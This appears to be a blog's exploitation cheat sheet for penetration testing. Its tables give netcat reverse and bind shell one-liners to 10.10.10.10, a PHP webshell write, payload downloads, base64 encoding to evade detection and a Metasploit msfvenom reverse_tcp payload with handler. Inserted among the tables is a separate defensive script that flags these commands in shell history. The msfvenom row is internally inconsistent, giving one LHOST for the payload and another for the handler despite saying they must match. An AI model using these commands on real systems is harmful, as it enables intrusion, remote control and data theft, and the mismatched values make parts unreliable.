Welcome to the blog's Exploitation Cheat Sheet! I will be actively updating it through commits as needed.
## Exploits

| Public Exploits | Description |
|---|---|
| `searchsploit openssh 7.2` | Search for public exploits in exploitdb. Try to search online too. |
| `searchsploit -m linux/remote/45233.py` | Get the PoC or exploit script. |
| https://swisskyrepo.github.io/PayloadsAllTheThings | PayloadsAllTheThings |
| https://book.hacktricks.wiki/en/index.html | HackTricks |
## Payloads & Shells

| Payloads & Shells | Description |
|---|---|
| `nc -lvnp 4444` | Start a nc listener on a local port: verbose mode, DNS resolution disabled. |
| `nc 10.10.10.10 4444` | Connect to a bind shell started on the remote server. |
| https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/ | Reverse shells cheat sheet. |
| https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/ | Bind shells cheat sheet. |
| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f \|/bin/sh -i 2>&1\| nc 10.10.10.10 4444 >/tmp/f` | Forward shell through a named pipe (reverse). |
| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f \|/bin/bash -i 2>&1\|nc -lvp 4444 >/tmp/f` | Forward shell through a named pipe (bind). |
| `script /dev/null -c bash`, then `Ctrl+Z`, then `stty raw -echo; fg`, then `reset xterm`, then `export TERM=xterm`, then `export SHELL=bash`, then `stty rows X columns Y` | TTY upgrading (run the steps in order; X and Y are your local terminal's size). |
| `python -c 'import pty; pty.spawn("/bin/bash")'` | TTY upgrading (python). |
| `echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php` | Create a PHP webshell file (the `$` is escaped so the shell does not expand `$_` before writing the file). |
| `curl http://10.10.10.10/shell.php?cmd=id` | Execute a command on an uploaded webshell. |
| **Transferring Files** | |
| `python3 -m http.server 4444` | Start a local webserver. |
| `wget http://10.10.10.10:4444/linenum.sh` | Download a file on the remote server from our local machine. |
| `curl http://10.10.10.10:4444/linenum.sh -o linenum.sh` | Download a file on the remote server from our local machine (curl variant). |
| `scp linenum.sh user@10.10.10.10:/tmp/linenum.sh` | Transfer a file to the remote server with scp (requires SSH access with a password). |
| `base64 linenum.sh -w 0` | Convert a file to base64, useful to avoid detection. |
| `echo f0VMR...SNIO...InmDwU \| base64 -d > linenum.sh` | Convert a file from base64 back to its original form. |
| `md5sum linenum.sh` | Check the file's md5sum on both ends to ensure it converted correctly. |
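On the defender's side, the one-liners in this table are exactly what a review of shell history or execve audit logs should flag. The script below is an added example, not part of this cheat sheet: it matches the named-pipe netcat shell, the python pty upgrade, the PHP webshell write and the base64-decode-to-file pattern against a constructed shell-history sample; the signature names and sample lines are my own.

```python
import re

# Signatures for the commands listed in the table above. The names are
# made up for this example; the patterns target the page's own one-liners.
SIGNATURES = {
    # rm /tmp/f;mkfifo /tmp/f;cat /tmp/f |/bin/sh -i 2>&1| nc ... (reverse or bind)
    "mkfifo_netcat_shell": re.compile(r"mkfifo\s+\S+.*\|\s*/bin/(?:ba)?sh\s+-i.*\|\s*nc\b"),
    # python -c 'import pty; pty.spawn("/bin/bash")'
    "python_pty_upgrade": re.compile(r"pty\.spawn\(\s*[\"']/bin/(?:ba)?sh[\"']\s*\)"),
    # echo "<?php system(\$_GET['cmd']);?>" > .../shell.php (backslash optional)
    "php_webshell_write": re.compile(r"system\(\s*\\?\$_(?:GET|POST|REQUEST)\["),
    # echo <blob> | base64 -d > file  (decode straight into a file on disk)
    "base64_decode_to_file": re.compile(r"base64\s+(?:-d|--decode)\b.*>\s*\S+"),
}


def classify(command: str):
    """Return the signature names that match one shell command line."""
    return [name for name, rx in SIGNATURES.items() if rx.search(command)]


def scan(lines):
    """Return (line_number, signature) pairs for every matching line."""
    return [(n, tag) for n, line in enumerate(lines, 1) for tag in classify(line)]


# Constructed shell-history sample (not real telemetry); mixes the cheat
# sheet's commands with ordinary ones to show what is and is not flagged.
SAMPLE_HISTORY = [
    "whoami",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f |/bin/sh -i 2>&1| nc 10.10.10.10 4444 >/tmp/f",
    "python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "base64 linenum.sh -w 0",
    "echo f0VMR...SNIO...InmDwU | base64 -d > linenum.sh",
    "ls -la /tmp",
]

if __name__ == "__main__":
    # Expected: lines 2, 3 and 5 are flagged; the encode-only base64 call is not.
    for n, tag in scan(SAMPLE_HISTORY):
        print(f"line {n}: {tag}")
```

The encode-only `base64 -w 0` line is deliberately not flagged; only a decode redirected into a file is treated as a staging indicator.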
## MSF

| Metasploit Command | Description |
|---|---|
| `msfconsole` or `msfdb run` (recommended) | Start the Metasploit Framework. |
| `workspace -a nibbles` | Create the "nibbles" workspace. |
| `workspace` then `workspace nibbles` | Display workspaces and change to the "nibbles" workspace. |
| `search exploit eternalblue` | Search for public exploits in MSF. |
| `use exploit/windows/smb/ms17_010_psexec` | Start using an MSF module. |
| `info`, `show options`, `show advanced options` | Show info and required options for an MSF module. |
| `set RHOSTS 10.10.10.10` then `set LHOST eth0` | Set a value for an MSF module option (`LHOST` accepts an interface name or an IP). |
| `check` | Test if the target server is vulnerable (not supported in some exploits). |
| `exploit` | Run the exploit on the target server. |
| `sessions` then `sessions 1` | Show sessions and select session 1. |
| `background` | Send the current session to the background. |
| `msfvenom -p windows/meterpreter/reverse_tcp --platform windows LHOST=192.168.0.31 LPORT=443 -f exe -o example.exe` then `msfdb run`, `use exploit/multi/handler`, `set payload windows/meterpreter/reverse_tcp`, `set LHOST 10.10.14.120`, `set LPORT 443`, `run` | Generate a payload with msfvenom and start a handler for it; the payload and handler must use the same LHOST and LPORT for the connection to be caught. |